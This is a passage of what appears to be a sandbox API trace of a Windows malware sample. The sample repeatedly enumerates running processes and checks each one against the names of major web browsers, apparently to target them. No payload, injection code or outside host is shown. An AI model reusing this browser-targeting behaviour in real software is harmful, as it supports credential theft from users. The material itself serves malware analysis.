lpString2="microsoftedgecp.exe") returned 1 [0213.538] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.539] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.539] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.539] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.539] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0213.539] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.539] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0213.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0213.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0213.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0213.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.540] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.540] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0213.540] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0213.540] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0213.540] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0213.540] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.540] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.541] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.541] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.541] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.541] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0213.541] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.541] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.541] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.541] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.541] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.542] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0213.542] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.542] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.542] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.542] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.542] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.542] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0213.542] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.542] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.543] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.543] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.543] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.543] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0213.543] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.543] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0213.543] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0213.543] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0213.543] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0213.543] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0213.543] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0213.543] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0213.544] CloseHandle (hObject=0xe8) returned 1 [0213.544] Sleep (dwMilliseconds=0x3e8) [0214.571] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0214.573] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.574] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0214.574] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0214.574] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0214.574] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0214.574] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0214.574] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.574] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0214.574] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0214.574] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0214.574] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0214.574] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0214.574] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.575] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0214.575] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0214.575] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0214.575] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0214.575] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.575] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.576] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0214.576] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0214.576] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0214.576] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0214.576] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.576] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.576] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0214.576] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0214.576] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0214.576] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0214.576] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.576] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.577] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0214.577] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0214.577] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0214.577] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0214.577] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.577] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.577] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0214.577] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0214.577] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0214.577] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0214.577] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.577] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.578] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0214.578] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0214.578] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0214.578] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0214.578] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.578] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.578] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0214.578] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0214.578] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0214.579] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0214.579] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.579] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0214.579] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0214.579] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0214.579] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0214.579] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0214.579] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.579] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.580] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.580] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.580] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.581] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.581] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.581] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.581] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.581] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.581] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.582] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.582] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.582] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.583] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0214.583] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0214.583] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0214.583] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0214.583] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.583] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.583] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.583] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.583] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.583] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.584] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.584] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.584] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.584] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.584] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.584] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.584] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0214.585] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0214.585] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0214.585] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0214.585] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.585] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0214.585] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0214.585] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0214.585] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0214.585] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.586] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0214.586] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0214.586] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0214.586] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0214.586] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.586] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.586] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.586] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.586] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.586] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.586] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.587] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0214.587] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0214.587] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0214.587] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0214.587] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0214.587] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.587] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0214.588] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0214.588] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0214.588] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0214.588] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0214.588] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0214.588] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0214.588] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0214.588] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0214.588] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0214.588] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0214.589] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0214.589] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0214.589] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0214.589] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0214.589] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0214.589] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0214.589] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0214.589] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0214.589] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0214.589] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0214.590] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0214.590] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0214.590] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0214.590] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0214.590] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.590] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, 